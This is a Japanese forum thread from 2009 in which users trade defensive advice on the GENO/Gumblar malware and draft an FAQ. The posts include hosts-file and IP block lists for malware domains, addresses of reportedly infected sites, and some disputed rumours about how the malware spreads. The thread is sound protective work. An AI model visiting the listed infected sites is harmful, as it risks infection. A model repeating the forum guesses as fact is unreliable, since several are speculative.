コードが貼ってありますねん。

>>395
なるほど、再構築か・・・
対策に入れる目的がわかった
ありがとー

>>404
ありがとー

avast激怒しかり、よくある質問解答集も必要なのか

>>383
そんな事気にするなら127.0.0.1にしとけよ

>>394
IDが出ないだけでああも荒れるのもすごいな

>>406
IDが最先端だな

■2chのスレを2chブラウザで開くとウイルスを検出する

ただのテキストのコードなのでウイルスに感染することはない、誤検出しないようにするには
1. avast!の標準シールドの感度を [普通] に設定 or avast!の標準シールドの例外設定に
2chブラウザのdatフォルダを設定
2. 2chブラウザでWebシールドを使わないように設定
ttp://ansitu.xrea.jp/guidance/?Trap#avast

>>402
できればJSオフでVerUPできるのが理想だから、
あえてJSオフを先にしてる。

>>407
ま、キャッシュクリアしたって困ることないからね。

あれ、ここには貼らなかったっけ

2chでスレを開いただけで対策ソフトが怒り出す件
http://www29.atwiki.jp/geno/pages/23.html

ここ最近、ＩＥが異常終了することが多いので
気になって全てチェックしたけど感染してなかった
なんで異常終了するんだよ　ヽ(`Д´)ﾉｳﾜｧｧｧﾝ

>>402
やっぱそっちに戻した方が楽かな。作業少なくて済むし

>>403
確認した。

>>414
どっちがいいかね。あくまで詳しくない人相手で考えてるけど

>>414
履歴さえあれば、ある程度追いかけられるし
キャッシュが必要かと言われれば　必要ない　と思うね

納得できたよ

>>409
avast激怒は1に書けばいいさ
アホがまたはる可能性あるからな

質問集はwikiみろでいいんじゃね

ここの人たちだけが頼りになる。

>>416
Windows
ttp://pc12.2ch.net/win/
気になるなら↑の質問スレで聞いてみたら

感染したPCとLANで繋がっていたPCのパスワードも盗み見されているから、
他のPCで使っていたパスも変えたほうがいいよ

なんかもうテンプレ作るよりこのスレをブログで紹介した方が早い気がしてきた。

>>422
今回のウイルスってそんなところまで深追いしてくるの?!

2000ならsqlsodbc.exeがなければ大丈夫らしいけど何故かcmdが起動しない…
これって感染してる？
一応regeditの方は起動できる

Adobe ReaderとFlash Playerを最新版したら１００パー感染しないの？

>>425
sqlsodbc.chmな

2000ならこれが存在していればまずアウト、念のためファイルサイズもbyte単位で

>>425
リカバリしろハゲ

>>420
>>423
セキュ板があれじゃぁ、こっちも時間の問題かもね。

>>422
そんな情報今までなかったけどソースある？
LAN内感染するならブロードキャストドメイン内が感染するってことだよね？

>>419
ああ、そうだねそうだった

>>422
うそん？感染したホスト以外のファイルのパス（位置）は探し出せないはずなんだがね
そもそもPCパスが何を指しているのか不明だが、ログインパスワードならもっての他

>>427
一応一部環境では2kでもsqlsodbc.chmが存在してもおかしく無い場合もある。
サイズが46〜50kならまぁ大丈夫、1kとか2kぐらいの小さい奴だとアウトの可能性大

>>429
ID見えるからあぼーんし放題ってことでこっち避難したんじゃなかったか？

>>358
◇そのほか予防策
・ブラウザのキャッシュをクリアする
・危険IPのブロック
　PeerGuardian2を導入。もしくはhosts書き換え
　ただしPG2は一部FWと競合する場合あり。

　　　　　　　　↓問題点↓

・キャッシュクリアは予防策としては意味が無い。消したキャッシュに危険なものがあれば既に感染済みなので
　予防になりようがない。危険なものがないのにキャッシュクリアした場合は予防として無意味。
・hostsとIPブロックは別のもの。併用が望ましい。

　　　　　　　　↓改定案↓

◇そのほか予防策
・危険IPのブロック
　セキュリティソフトのFWでブロックするか、PeerGuardian2を導入。
　ただしPG2は一部FWと競合する場合あり。
　・推奨されるブロック範囲
　　martuz.cn:95.129.144.0-95.129.145.255
　・予防的に設定する範囲
　　gumblar-russian:94.229.64.0-94.229.79.255
・hosts書き換えで、危険ドメインに繋がらなくする
　　127.0.0.1 martuz.cn
　　127.0.0.1 gumblar-russian
　　#127.0.0.1 hs.2-195.zlkon.lv
−−−−−
IPブロックの効能
　・危険IPに接続できなくなるので、危険ファイルに接続できなくなる効果が見込める。
　・PCのOS入れなおしに時間がかかる場合、IPブロックによって盗まれた情報を送信できなく
　　することで、HP更新の応急処置をすることが可能かもしれない。
　　但し、盗まれたデータの送信先を突き止めないとブロック対象がわからないのが問題。
　・ネトゲのアカウントハッキングならCNを全ブロックでいいのですが、今回のものは
　　複数の国のドメインを渡り歩いているので、ブロック範囲を絞りこめません。
　　危険ファイルへのアクセスをブロックする効能だけでよしとしましょう
hosts変更の効能
　スクリプトが呼び出すのがドメイン名の場合、DNSより先に参照されるhostsの登録先を
　変更することで、危険ファイルの置いてある場所に繋がらなくする効果が見込める。

>>427
アウトじゃないよ
md5確認しろよ

ニフティのオンラインスキャンでロックかかってスキャンされなかったファイルあるけど
それは普通に気にしなくて大丈夫なんだろうか？

>>358,>>389
（続き）

gumblar.cn:94.229.65.172は、正引きできないようになっている為。
生IPはサーバーの応答が停止しているものの生きている状態です。
現在はブロックしても無意味ですが、動作再開の時の為に予防的にブロック。

zlkon.lv：94.247.2.195 : hs.2-195.zlkon.lvは、ドメイン名でも生IPでも
応答停止のため登録する意味はありません。

zlkon.lvと完全一致する名前での攻撃がないため登録しても無意味とのこと。
hs.2-195.zlkon.lv という名称で登録してもいいが別名もあり効果は見込めないで
あろうとのこと。サーバー自体が死亡しているので、登録不要のようです。

>>432
うん、だからファイルサイズも要求してみた
普通の環境だとまず無いと思ってるから

間違えた。

◇そのほか予防策
・危険IPのブロック
　セキュリティソフトのFWでブロックするか、PeerGuardian2を導入。
　ただしPG2は一部FWと競合する場合あり。
　・推奨されるブロック範囲
　　martuz.cn:95.129.144.0-95.129.145.255
　・予防的に設定する範囲
　　gumblar-russian:94.229.64.0-94.229.79.255
・hosts書き換えで、危険ドメインに繋がらなくする
　　127.0.0.1 martuz.cn
　　127.0.0.1 gumblar.cn
　　#127.0.0.1 hs.2-195.zlkon.lv

sqlsodbc.chmはヘルプファイルとして開けるかが一番重要なんじゃないか

>>440
そういうこといってると、正常な.chmファイルのケツにくっつけるように仕様変更されてきたら
びみょーにかっちょわるいから、あんまアテにせんほうがいいｗ 現時点仕様としては正解

>>434でhosts書き換えが127.0.0.1に変わってるのは何か意図があってのこと？
それとも気まぐれ？

>>439
GJであります！

これはルーターを介しても感染するの？

>>434,437,439
PGはよく把握してないんで助かる。予防策以下は分割にしよう

>>442
127.0.0.1は自PCへのループバック。
0.0.0.0はネットワーク上に存在しないIPアドレス。
外に繋がらんっつー意味では変わらんからおｋ

ht p://ruru2.net/jlab-ruru/s/ruru1242650727221.jpg
これ大丈夫かな？

鑑定スレじゃないんで

>>403　>>414
確認した。
うーん普段JS実行がデフォでポップアップするのに慣れてるからか
始まらない場合をクリックする前にJS実行に戻してからｲﾝｽｺしなおした俺ｗ
これでどうかな？

４．Adobe Acrobat Reader の最新版にアップデート
（「ダウンロードが開始しない場合は、 ここをクリックしてください。」をクリックする。）

これでどうかな？

>>439
> 　　martuz.cn:95.129.144.0-95.129.145.255

これの表記は　95.129.144.0/23　で合ってるかな？
いまいち苦手だわ

>>439
これ最後の一行が#で無効にならない？

>>449
それでおｋじゃないかな
てかFlashも同じようにしてくれればいいのに・・・・＜Adobe

>>427
sqlsodbc.で検索したらhlp(17KB)が出てきたけどchmはなかった

>>449
固定のリンク拾ったから多分平気
ttp://ardownload.adobe.com/pub/adobe/reader/win/9.x/9.1/jpn/AdbeRdr910_ja_JP.exe

>>450
＞95.129.144.0/23
これに直す必要があるファイアウォールを使用していたりするの？
PG2やOutpostだとこの表記（95.129.144.0-95.129.145.255）で利用した方がいいけど。

>>441
仮にもウイルス動作のキーと目されてるファイルを開くって行為も
個人的には怖い。
自分はエディタの先頭ヘッダ見て正常を確認したけど、
普通の人には酷だし、それ(フッタに追加)やられると分からなくなるしなぁ・・・。

>>453
それ中身読める？

>>451
>437だからほとんど無意味だから無効にしてあるんじゃね？
おそらく自前で設定したhostsからコピペしたんだろｗ

>>455
バスターは範囲指定出来るけど、ルータの方が範囲指定駄目なんだよね
192.168.0.0/16とか指定しないと駄目

ファイヤーウォールのログ見ても
怪しいＩＰ無かったよ

>>442
0.0.0.0だと、デフォルトゲートウェイ宛になってしまうので余り望ましくなかった筈。
ローカルループバックの127.0.0.1の方なら安心かと。

>>451
>458が代わりに回答してくれた。登録しなくていいよという意味。（どこいったとか質問されるよりコメントアウトのがいいかなと）

１．Adobe Flash Player の最新版にアップデート
２．Adobe Acrobat Reader の最新版にアップデート
３．NoScriptの導入（Firefoxの導入）
４．Adobe Acrobat Readerの JavaScript 機能OFF
５．危険IPのブロック　テンプレサイトの焼却炉のブロックIP
58.65.232.0 - 58.65.239.255
61.139.0.0 - 61.139.127.255
61.219.39.0 - 61.219.39.255
61.235.117.0 - 61.235.117.255
61.237.236.0 - 61.237.236.255
63.146.2.0 - 63.146.2.255
69.46.0.0/19 (69.46.0.0 - 69.46.31.255)
74.220.215.0-74.220.215.255
78.109.16.0/20 (78.109.16.0 - 78.109.31.255)
78.159.112.0 - 78.159.115.255
82.146.48.0/21 (82.146.48.0 - 82.146.55.255)
83.68.16.0 - 83.68.16.255
85.12.43.0 - 85.12.43.255
85.14.6.0 - 85.14.6.255
85.17.0.0 - 85.17.255.255 (CIDR:85.17.0.0/16)
85.214.90.0 - 85.214.90.255
91.211.64.0/23
91.212.41.0/24
91.212.65.0/24
91.212.41.0- 91.212.41.255
91.212.41.0/24 (91.212.41.0 - 91.212.41.255)
94.232.248.0 - 94.232.255.255
94.229.64.0/20 (94.229.64.0 - 94.229.79.255)
94.247.2.0 - 94.247.3.255
194.165.4.0/23 (194.165.4.0 - 194.165.5.255)
195.2.252.0/23 (195.2.252.0 - 195.2.253.255)
195.216.160.0 - 195.216.191.255
206.44.0.0 - 206.44.255.255 CIDR:(206.44.0.0/16)
209.44.100.0/24
209.44.126.0/24
209.62.7.0/24
209.102.247.0/24
209.250.241.0/24
209.205.192.0-209.205.223.255
209.205.224.0-209.205.239.255
211.90.0.0 - 211.97.255.255
213.182.192.0 - 213.182.223.255
218.90.0.0 - 218.94.255.255　　　　　をして、まだ誰にも知られてない感染サイトに行きNoScriptをオフにしたら感染しますか？

>>457
普通に読めた

>>458>>462
そか　忙しいのにありがとね

◆感染対象
今のところWindows 2000,XP で感染確認

◆感染してるっぽい場合
ＯＳクリーンインストール一択

◆対策　※感染してしまってから対策しても無駄です。素直にOS再インストールしてから対策を

１．Windows Updateをやる

２．使用しているブラウザのJavaScriptをオフにする。これ重要
　（FirefoxならNoscript導入が便利）

３．Adobe Flash Player の最新版にアップデート
　JSオフだと更新できないので↓のリンクからインストーラーを落として入れる
　IE版　　　 　ttp://www.macromedia.com/go/full_flashplayer_win_ie
　その他版　　ttp://www.macromedia.com/go/full_flashplayer_win

４．Adobe Acrobat Reader の最新版にアップデート
　３と同様にインストーラーをダウンロードして入れる
　ttp://ardownload.adobe.com/pub/adobe/reader/win/9.x/9.1/jpn/AdbeRdr910_ja_JP.exe
　インストールが終わったらAdobe Readerを起動し
　メニューの「ヘルプ(H)」にある「アップデートの有無をチェック」をクリック。更新が見つかったら入れる。
　終わったらバージョンチェックして下記の数字になっていればok

５．Adobe Acrobat Readerの JavaScript 機能OFFにする

６．セキュリティ対策ソフトもパターンを最新に更新

2009/05/18時点での最新版
Adobe Flash Player　10.0.22.87
Adobe Reader　9.1.1

Flash Playerのバージョンチェックはここで（JS、AXをオンにする必要あり）
ttp://www.adobe.com/jp/support/flashplayer/ts/documents/tn_15507.htm



短くなったついでで手順を書いてみた。５についても余裕があれば手順追記を

>>450
95.129.144.0/24
95.129.145.0/24

の二つ登録すれば？
計算しなくてすむっしょｗ

クリーンインストールするのはいいけど、システム関係以外のファイルは問題ないの？

>>467
わかりやすいからそれ採用！
thx

>>464
http://www3.atword.jp/gnome/zlkon-gumblar-%E5%95%8F%E9%A1%8C%E3%81%AB%E9%96%A2%E3%81%97%E3%81%A6/

の現鑑定方法では白ですね

【何故かcmdが起動しない】でどこかで質問してはいかがでしょうか

>>466　乙です。

暇だから計算してみたけど>>450のであってるね

>>466
対策なら、Adobe Flash Player,
Adobe Acrobat Readerを最新版にしてから
JavaScriptをオフにさせれば、楽じゃね?

完成した

cnなどの怪しいトップレベルドメインは全て遮断
94.229.65.172など、IPアドレスを全て遮断
2chは全て許可

手始めに、IE　ActiveX JavaScript共にONで
勇気がなくて踏めない人のための鑑定スレを手当たり次第踏んでくるよ！
http://pc11.2ch.net/test/read.cgi/hack/1230787611/

>413
って自分もただのテキストコードだと思ってたんだけどさ、
レジストリ書き換えようとしてくるよ？spybotが反応する。
ブラウザのただのchromeだし。
こういう場合も大丈夫なのかな？
ちなみにavastが鳴ったのは邦楽ソロ（男性）板。

>>473
>414　JSが動いてない状態ならPDFのDL等が起きず、その後の進行もなくなる。
だから優先度としてはブラウザのJSオフを先に〜という流れなのさ。
楽だから後に〜というのは対策としてはベターじゃないよね？

無茶しやがって

>>470
cmdのことが気掛かりだけどとりあえず白か…
サンクス

>>475
バカはケータイ使ってろ

>>373
新パスと同じ文字列をクリーンインストール前の感染PCで
FTP以外のログイン等に使用した記憶はない？

かなり厄介なウィルスなのに本当にニュースになってないな。
マジでクリーンインストールするか迷ってる。
手っ取り早くデーター移せる外付けHDDがほしいぜ。

>>473
よく分からない人にはそっちの方が説明楽でいいんだがな。
どっちの状態でも出来るようにしてみた



３．Adobe Flash Player の最新版にアップデート　→　ttp://get.adobe.com/jp/flashplayer/
　JSオフで更新できない場合↓のリンクからインストーラーを落として入れる
　IE版　　　　 　ttp://www.macromedia.com/go/full_flashplayer_win_ie
　その他版　　ttp://www.macromedia.com/go/full_flashplayer_win

４．Adobe Acrobat Reader の最新版にアップデート　→　ttp://get.adobe.com/jp/reader/
　３と同様の場合、↓からインストーラーをダウンロードして入れる
　ttp://ardownload.adobe.com/pub/adobe/reader/win/9.x/9.1/jpn/AdbeRdr910_ja_JP.exe
　インストールが終わったらAdobe Readerを起動し
　メニューの「ヘルプ(H)」にある「アップデートの有無をチェック」をクリック。更新が見つかったら入れる。
　終わったらバージョンチェックして下記の数字になっていればok

スキル無い俺は当分2chにひきこもろｗ

対策は全部した。
でもIEがたまに強制終了するよ

>>483
引き篭もって早二日だぜ
暇すぎる

偽装画像とかでの感染もあるんだろ？
そっちがきたらJSオフもAdobe最新にしてても意味ないんだよな？
Adobeを使わないタイプの割合ってどんなもんなんだ？

インターネットオプションの「拡張子ではなく、内容によってファイルを開く」も
無効にしとけばより強固になるよ（色々不便な事も出てくるけど）

AdobeのサイトでReaderをダウンロードしようとすとIE8が
サイトをブロックして出来ない。

◆感染対象
今のところWindows 2000,XP で感染確認

◆感染してるっぽい場合
ＯＳクリーンインストール一択

◆対策　※感染してしまってから対策しても無駄です。素直にOS再インストールしてから対策を

１．Windows Updateをやる

２．使用しているブラウザのJavaScriptをオフにする。※これ重要
　（FirefoxならNoscript導入が便利）

３．Adobe Flash Player の最新版にアップデート　→　ttp://get.adobe.com/jp/flashplayer/
　JSオフだと更新できないので、その場合は↓のリンクからインストーラーを落として入れる
　IE版　　　　 　ttp://www.macromedia.com/go/full_flashplayer_win_ie
　その他版　　ttp://www.macromedia.com/go/full_flashplayer_win

４．Adobe Acrobat Reader の最新版にアップデート　→　ttp://get.adobe.com/jp/reader/
　うまく更新できない場合↓のインストーラーをダウンロードして入れる
　ttp://ardownload.adobe.com/pub/adobe/reader/win/9.x/9.1/jpn/AdbeRdr910_ja_JP.exe
　インストールが終わったらAdobe Readerを起動し
　メニューの「ヘルプ(H)」にある「アップデートの有無をチェック」をクリック。更新が見つかったら入れる。
　終わったらバージョンチェックして下記の数字になっていればok

５．Adobe Acrobat Readerの JavaScript 機能OFFにする

６．セキュリティ対策ソフトもパターンを最新に更新

2009/05/18時点での最新版
Adobe Flash Player　10.0.22.87
Adobe Reader　9.1.1

Flash Playerのバージョンチェックはここで（JS、AXをオンにする必要あり）
ttp://www.adobe.com/jp/support/flashplayer/ts/documents/tn_15507.htm

感染したかの判別法で明確なのってきてるの？
regeditやcdm.exeが動かないってのではもう無理なの？

◆そのほか予防策
・危険IPのブロック
　セキュリティソフトのFWでブロックするか、PeerGuardian2を導入。
　ただしPG2は一部FWと競合する場合あり。
　・推奨されるブロック範囲
　　martuz.cn:95.129.144.0-95.129.145.255
　・予防的に設定する範囲
　　gumblar-russian:94.229.64.0-94.229.79.255

・hosts書き換えで、危険ドメインに繋がらなくする
C:\Windows\System32\drivers\etc\　を開く。
そこにある「hosts」というファイルをデスクトップにコピペする
コピペしたものをテキストエディタ（メモ帳でもよい）で開き、以下を最後の行にコピペ

# GENOウイルス対策5月18日
127.0.0.1 martuz.cn
127.0.0.1 gumblar.cn
127.0.0.1 hs.2-195.zlkon.lv

終わったら保存して閉じる。
そして編集したファイルを元の場所へ上書きする。


◇IPブロックの効能
　・危険IPに接続できなくなるので、危険ファイルに接続できなくなる効果が見込める。
　・PCのOS入れなおしに時間がかかる場合、IPブロックによって盗まれた情報を送信できなく
　　することで、HP更新の応急処置をすることが可能かもしれない。
　　但し、盗まれたデータの送信先を突き止めないとブロック対象がわからないのが問題。
　・ネトゲのアカウントハッキングならCNを全ブロックでいいのですが、今回のものは
　　複数の国のドメインを渡り歩いているので、ブロック範囲を絞りこめません。
　　危険ファイルへのアクセスをブロックする効能だけでよしとしましょう

◇hosts変更の効能
　　・スクリプトが呼び出すのがドメイン名の場合、DNSより先に参照されるhostsの登録先を
　　　変更することで、危険ファイルの置いてある場所に繋がらなくする効果が見込める。


gumblar.cn:94.229.65.172は、正引きできないようになっている為。
生IPはサーバーの応答が停止しているものの生きている状態です。
現在はブロックしても無意味ですが、動作再開の時の為に予防的にブロック。

zlkon.lv：94.247.2.195 : hs.2-195.zlkon.lvは、ドメイン名でも生IPでも
応答停止のため登録する意味はありません。

zlkon.lvと完全一致する名前での攻撃がないため登録しても無意味とのこと。
hs.2-195.zlkon.lv という名称で登録してもいいが別名もあり効果は見込めないで
あろうとのこと。サーバー自体が死亡しているので、登録不要のようです。

>>489
乙
こっちはそろそろ寝る、また明日の夜来るけどその頃には次スレ行ってそうだな

>>490
動く亜種も出てきてるって話

とりあえず現在のテンプレ案が>>489,491
都合によりいいかげん寝なくてはならんので協力してくれた諸氏には申し訳ないが、後を頼む
　　　　　　　　　_,,..,,,,_ . ＿
　　　　　　　　./ ,' 3 ／ 　 ヽ--、
　　　　　　　　l　　 / 　　　　　 　ヽ、
　　　　　　 ／`'ｰ/＿＿＿＿＿／
　　　　　　 ￣￣￣￣￣￣￣￣

>>482
感染していないことを前提にしているのだから
なるべく手続きは簡単な方が初心者には親切。
Windows Updateから、すぐに最新版を導入のページに
いくように指示すれば、その次にJavaScriptをオフにしても
それほど問題はないとおもわれる。

ただいま生還しました>>474です。
相当に危険なURLが埋め込まれていまいたが無事に帰ってきました。

ttp://www3.atword.jp/gnome/zlkon-gumblar-%E5%95%8F%E9%A1%8C%E3%81%AB%E9%96%A2%E3%81%97%E3%81%A6/

ウイルス概要　感染予防　感染チェック　感染後の処置まですべて

>>495
自己補足として、
誰が読んでも分かるようにするためには
長いテンプレは、出来るだけさける。

それと
Vistaの場合は、UACってなに？有効かどうかどうやって確かめるの？
というのをよく聞かれた。

有益な情報なんにも出せないROM専がでしゃばってすまんが
テンプレ案書く時は名前欄に「テンプレ案」とか入れとくと見やすいんじゃね？　とか思った

>>493
そっか、本当おっかないな
仮に感染したさいの有効な駆除方法がクリーンインスコだけってのがなぁ

これ日本人が作ったぽいの？

>>496
無茶しやがってｗ
てか、スレ違いだｗ

F-SecureでIP遮断する方法わかる人いるかね

無茶しつつやりがやって

>>502
ご心配かけました。

>>503
とっとと失せろハゲ

質問何ですが、感染PCから必要なファイルの吸い上げってやっても問題ない？
普通のウィルスと一緒でアウト？

>>507
日本語でおｋ

今日はもうリカバリする時間無いからケーブル引っこ抜いてネットにつないでない状態にしても
意味ないですかね。今更。

>>508
既にほぼ感染が確定している端末から、外付けHDDに必要なファイル(ワードなど)を移動しても問題ないかな？

>>503
F-Secureへ検体提供している人ならここにいるけど…何か用ですか？
F-SecureのFW設定でステップに従って設定すればいいだけなのに？

native-instruments
ttp://www.native-instruments●jp/index.php?id=audiokontrol1
危険度121%
かなり危険なURLです。友人のPCを壊すのに利用しましょう！
絶対に踏んではいけません。
評価ミス報告

一応張っておく

大丈夫だよ。

大丈夫か
一応、次に開く時はVistaのノートンでチェックかけてからにするか

>>511
ファイヤーウォールのとこ？
よくわかんないけどいじってみる
ありがとう

>>481
大手企業のも掛ってるから圧力掛ってるとか言われてるけど、実際のところどうなんだろうね。
新型インフルに負けず劣らずの脅威だと自分は思うんだけど。

というか痛いニュースとかでも全然載ってないね。
情報が錯綜しているから管理人が様子見してるとか？それとも、流行りだしたころに「痛いニュースが感染」ってデマが流れたからかな。

gnomeの人も大変だろうな。
注意しても逆切れされてとか色々。俺なら投げてるわ

>>512
なぜか遮断となってしまったorz
.jpは通すはずだけどネタサイトですか？

Adobe Readerアンインストールすれば無敵

>>516
抜かれるのがFTPのIDとパス？何それ？サイト？ああホームページね持ってないから関係ない

という考えの人が多いような気がする
これがある一定の数まで感染した頃に一斉にクレカの情報などを感染PCから抜き始めたら
たぶん皆大騒ぎすると思う

>516
２ちゃんでも、あまり話題になってないんだよな

>>517
さらにNifty感染デマの発信源にされちゃってるしな

マスコミもIT弱者。権威ある所が何か言わないと動けない。
ウイルスベンダが対策追いつかない為、どこのウイルスベンダも沈黙を守ったまま

無名の技術者がいくら警笛鳴らしても、マスコミは動かんよ

>>512 は
www.native-instruments.comへ飛ばす仕組みですか

>>512
googleから検索して行って見たけどスルー。
当方VISTA（UACon）＋avast！（＋spybot+AntiVir）
UACの反応も無論なし。
>>518
サウンドミキサーの紹介ページ。自分も友人から譲り受けたの使ってる。大体三万位らしいけどかなり良いよ･･････ってスレチか。

このウイルスに感染した場合
FTPでWebサーバーにファイルをアップロードする際に
アカウントを盗みとられ、それによりWebサイトが
改竄されるという話もある。特にWebサイトを運営している方は
注意が必要だろう。
http://slashdot.jp/security/article.pl?sid=09/05/18/1021242

俺はサイト運営してないから関係ねーって人が多そう
この記事も〜されるって書いてるし
なんか曖昧

>>516
クレジットカードの番号だとかID,PASSとか普通に抜かれる脅威があるのに
かなり深刻だよな。
明日本気でリカバリするわ。流石にクレジットの番号抜かれたらしゃれにならん。
ていうかもう遅いのかな?感染してからリカバリしても。いずれにしてもするけど。

F-Secure Update報告を検体スレに記載しました。

内容：
検体スレの id10で提供のあった検体について、18日付の定義
F-Secure Hydra Update 2009-05-18_01
F-Secure Hydra Update 2009-05-18_02
のどちらかで対応されました。
(チェックするの忘れてて、30分前に気づいたら02がDLされてたので
 正確にどちらで対応されたかまでは不明…)
また、sound●jp/yudai_marimba/にて埋め込まれていた
スクリプトについて、F-Secure Security Labs より
次回DB更新にて対応との回答がありました。
おそらく、先ほどの Hydra Update にて対応されているものと推測されますが、
該当のWebサイトが403応答のため確認できず。

以上、長駄文失礼しました。

こういう注意喚起してほしいよな
・もしウイルスに感染した場合、インターネットのサイトで
　入力したパスワード等すべて盗聴される、と。

それくらいの勢いでやらないと。

>>525
サウンドミキサーの紹介ページですか参考になりました。
.comはとりあえず遮断としていたから見れなかったけどまともなページのようで。
Location で即座にjpからcomへ飛ばす装置がついてたようで・・・

何度も書き込みましたが、よろしかったら教えてください
知りたいのはGENOウイルスの【拡張子】です

swnjn

(ﾉ∀`)ｱﾁｬｰ

マルチフィッシングご苦労様です

ﾜﾛﾀｗｗｗ

ジャーン

>>531
.genoに決まってるじゃないか

実行ファイル見つかってるならここまで焦らないだろ・・・

分かってたらここまで大騒ぎして検体だの何だの言ってません

>>538
e.batが自動削除される前に捕まえるんだ

かなり危険な>>512が防げたから
GENO防止対策だけは万全と考えていいですか？

専門的な話しをしている所すみません。感染した場合リカバリするしかないようですがファイルが壊れたと起動すらしない場合リカバリって出来るのでしょうか？まとめサイトではリカバリをとしかなかったので困り果ててます。スレチでしたらスルーして下さい

>>512
DTM板住人やばくね？

>>541
ひとつひとつ防御を外していく作業に取り掛かるんだ
まずはIPブロック、次はjavaScript、次はreader
いや冗談だよ

>>544
合格をいただきありがとう
JavaScriptほかIEはデフォルトのままなので
許可した国内サーバーがハックサイトならイチコロです

>>542
どういう方法でリカバリするかによる
普通はOSのCDを使う。
HDDではなく、CDドライブで起動させるから関係ない
HDDにリカバリセットがある場合はどうなんだろうね

ノートン先生GENO対策はまだですか？

>>545
乙です。

>>547
ユーザーなら検体提出すればいいじゃん

stargazer●flop●jp/pl/mythos/

GENOウイルスチェッカー
危険度0%
安全なURLです。踏んでも大丈夫でしょう。

声同人サイト。
感染報告あり、現在は対策済みとのこと。
オンラインでの制作協力の募集の際、応募者から感染した疑い。
募集サイトなどにも登録していたため、被害が拡大してる可能性あり。

対応済みサイトはいらないんじゃないの？
検体手に入らないし
つか対応済みもありならいくらでも出せるんだが

>>550
そんな経緯で感染したのなら
また感染サイトに戻る可能性もありそうですね

対応済みのも晒すとなると混乱するぞ

>>550
KINOSHITA氏乙

SANSキター

JSRedir-R/Gumblar badness
ttp://isc.sans.org/diary.html?storyid=6403

確認

対応済みと誤検出とか誤報分はさっさと消していった方が良いと思う
と言うか対応済みになったら消すって話だったはずだし。

リンク集の人は今はいないのかな

>>555
危険サイトですが、遮断できました。

>>551
そう思ったんだけど、感染の経緯が気になったので一応。

さてＧＥＮＯ感染したわけなんだが
さっさとリカバリしたほうがいいおね？

もちろんです

どこで感染したか心当たり書いていきなさいな

どうせだから検体提供してからリカバリすればいい

◆感染してるっぽい場合
残念ながら、現状では回復不能です。
ＯＳクリーンインストール一択

198 名前：192.168.0.774[sage] 投稿日：2009/05/17(日) 14:53:04 ID:Um/4qeYR0
このサイト見たらアヴァストが反応するんだけどどうなの？
反応したってことは大丈夫なんだろうけど・・・
一応閲覧注意な
ＨＴＴＰ；／／pmpk.dojin.com/

>>565
過去ログ嫁

>>565
ってかコピペした名前欄見てわかれｗ

>>562
心当たりがまったくないんだこれが


ところでデータのバックアップは取っておいても問題ないよな？

Windows Live OneCare PC セーフティ ダメ元でどないさ？
検出できるかもだぞ（自己責任で）

ディスクトップにエロサイト登録云々の窓が出て消えません。

どうやって消すんですか？(^･ｪ･)

画像やMIMEで感染することもあるってけっこう前のレスで見たことあるんだけど
これに当たったらFlashとか最新でも意味ないってことだよね？
画像はJS切っててもダメだし
あんまり無いみたいだけど、これらに当たる確立ってどのくらいですかね？

>>558
勇者乙。

ブラウザによっては設定で画像の表示もカット出来るのあるから
それも推奨した方がいいかもね
これに限らず色々な予防になるだろうし

DEP全がけはちょっとは気休めになる？
手っ取り早い方法かなとは思うんだが

>>571
jpg感染が話題になったころって結構前だと思うけど
その辺の脆弱性ってもう塞がれて無かったっけ？

未知のウイルスに怯えるのが嫌なら、もはや根性論みたいな世界だが
下記である程度は防げる。
1段階目
・JS/ActiveX OFF
・ちょっとでも怪しいと思われるサイトにいかない/リンクはクリックしない
・FWやアンチウイルスなどで外へ/外からのアクセスはかなり限定して絞る
・ダブルクリックでファイルオープンしない

2段階目
・携帯/ゲーム機/スマートフォンなどのモバイル機のブラウザでネットは済ませる

3段階目
・そもそもネットしない

cmd.exe動いても感染してる人もいるみたいだし、
今現状、sqlsodbc.chmの書き換えくらいでしか
genoウイルスの判断が出来ないってのが怖いね。

JavaScript切って画像もOFFにしなきゃだめかな？
もうブラウザ使わなってことか？

>>575
ありがとうございます
JSはオフにして必要な時は先にソース覗いてるんだけど
画像は防げないから怖くてね。でもけっこう前の話だったのか。すまん

さっきIE（厳密にはルナ）でこのスレ見たら
Avastたんが2回くらい「こらぁーっ！」て

これも>>88みたいな誤検知でいいんだよな？
テンポラリ辺り見てたみたいだし
しかし反応ある事自体が恐ろしすぎる…

>>578
画像ファイル関係の脆弱性が最近また発見されたならわからないけど。
こまめにWindowsUpdateしておくしかないんじゃないかな。
画像が怖いなら画像ブロックすればいいけど、
そこまで不便にしてもいいならもう携帯なりでブラウズしたほうが
安心なんじゃない？

すみません、
過去スレが見られないのでお聞きしますが
mixiやPixivといった動的サイトの感染報告はあるのでしょうか。

ノートン先生の更新きたが対応したのだろうか

精神衛生上一番いいのは、もう1台安いPCで
良いからネット専用機を用意することだね
で、極力PC内に情報を入れない。
ログインユーザー名もニックネーム程度にとどめる

>>581
セキュ板は途中から見なくなったが
他板のログを見る限りmixiとpixivの報告例はないな

>>584
リンク集の方にはピクシブの報告が上ってる
感染の疑いがあるサイト(未確認)で
ピクシブの一部ページで感染確認ってコメントがある
どうなんだろうな？

>>584
ありがとうございます。
利用者人口や更新頻度の膨大さを考えると
動的サイトの感染は今の段階では無いと考えても良さそうですね。

>>585
それいたずらか誤検出だと思うんだけどねぇ
それこそ誰ぞがAvast激怒の文字列をコメに書いたら反応するんでｗ

こういう認識で良いのだろうか？

１．改竄されたサイトにアクセス
２．悪意あるコードが実行され、AdobeReaderなどの脆弱性を利用しウィルスがダウンロードされる
３．>>1にある症状が発症

結果、該当ソフトを最新版にしセキュリティホールを潰しておけば改竄されたサイトを踏んでも
ウィルス感染はしない？

SNS系がやられたらもっと大騒ぎになってると思うな
もしかしたらそう遠くない未来の話かもしれんが

ファイル書き換えが行われないケースもあるって話はどうなりました？

>>588
セキュリティホールって何か知ってる？

>>587
だよな。俺も誤検出かなんか別のとの勘違いとしか思えないんだよな
ピクシブなんて同人板から注意喚起に協力しろって凸されてたくらいだし

>>579
ttp://www29.atwiki.jp/geno/pages/23.html

>>585
586ですがすみません、リロってなかったorz

今の段階では危険性は低そうなものの、今後の為にも注意するに越した事はなさそうですね。
ありがとうございました


ついでにもう一つお聞きしたいのですが、
感染報告のあった企業のサイトに大学のパソコンでアクセスしてしまった事があるのですが
(GENOの存在を知ってから感染確認してみましたが大丈夫でした)
万が一イントラネットで繋がっているパソコンが感染した場合、繋がっているパソコンにも感染する危険性はあるのでしょうか?

>>583
そのPC常にONにしとかないと。
感染後に電源切ったらアウアウ。

学校のPCの場合、システムによって変わるだろう
